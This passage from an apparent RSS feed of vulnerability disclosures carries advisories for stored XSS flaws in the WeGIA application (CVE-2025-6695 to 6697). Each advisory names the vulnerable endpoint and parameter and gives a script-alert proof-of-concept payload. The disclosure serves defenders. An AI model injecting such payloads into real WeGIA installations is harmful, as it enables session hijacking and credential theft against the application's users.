&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/matPat/adicionar_categoria.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6695-cross-site-scripting-xss-stored-endpoint-adicionar_categoriaphp-parameter-categoria&amp;#34;&amp;gt;CVE-2025-6695: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_categoria.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Categoria&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6695&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6695&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_categoria.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Categoria&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/matPat/adicionar_categoria.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Categoria&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Categoria&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Poc VulDB&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6695/image.png&amp;#34;
	width=&amp;#34;1911&amp;#34;
	height=&amp;#34;992&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6695/image_hu_fe6ecfa94b00b912.png 480w, /p/cve-2025-6695/image_hu_707ca28be50f53f5.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;192&amp;#34;
		data-flex-basis=&amp;#34;462px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6695/image-1.png&amp;#34;
	width=&amp;#34;1890&amp;#34;
	height=&amp;#34;988&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6695/image-1_hu_e1aad1c294d8b48e.png 480w, /p/cve-2025-6695/image-1_hu_547e87c56180f7a2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;191&amp;#34;
		data-flex-basis=&amp;#34;459px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/VZs4hmHYaXQ&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/VZs4hmHYaXQ&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6695.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6695.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 26 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6696</title>
        <link>https://www.cvehunters.com/p/cve-2025-6696/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-6696/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6696-cross-site-scripting-xss-stored-endpoint-cadastro_atendidophp-parameter-cpf&amp;#34;&amp;gt;CVE-2025-6696: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;Cadastro_Atendido.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6696&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6696&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;Cadastro_Atendido.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/atendido/Cadastro_Atendido.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6696-cross-site-scripting-xss-stored-endpoint-cadastro_atendidophp-parameter-cpf&amp;#34;&amp;gt;CVE-2025-6696: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;Cadastro_Atendido.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6696&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6696&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;Cadastro_Atendido.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/atendido/Cadastro_Atendido.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Cadastro_Atendido.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Poc VulDBeeee&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; ;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6696/image.png&amp;#34;
	width=&amp;#34;1896&amp;#34;
	height=&amp;#34;977&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6696/image_hu_ffda6c40e75d1bcf.png 480w, /p/cve-2025-6696/image_hu_278d1476974e3453.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;194&amp;#34;
		data-flex-basis=&amp;#34;465px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6696/image-1.png&amp;#34;
	width=&amp;#34;1918&amp;#34;
	height=&amp;#34;995&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6696/image-1_hu_eda3fb9ed78bea61.png 480w, /p/cve-2025-6696/image-1_hu_c818ef974e37dd7b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;192&amp;#34;
		data-flex-basis=&amp;#34;462px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/BCqqmDk0pH8&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/BCqqmDk0pH8&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6696.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6696.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 26 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6697</title>
        <link>https://www.cvehunters.com/p/cve-2025-6697/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-6697/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6697-cross-site-scripting-xss-stored-endpoint-adicionar_tipoentradaphp-parameter-tipo&amp;#34;&amp;gt;CVE-2025-6697: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_tipoEntrada.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6697&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6697&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_tipoEntrada.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/matPat/adicionar_tipoEntrada.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6697-cross-site-scripting-xss-stored-endpoint-adicionar_tipoentradaphp-parameter-tipo&amp;#34;&amp;gt;CVE-2025-6697: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_tipoEntrada.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6697&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6697&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_tipoEntrada.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/matPat/adicionar_tipoEntrada.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
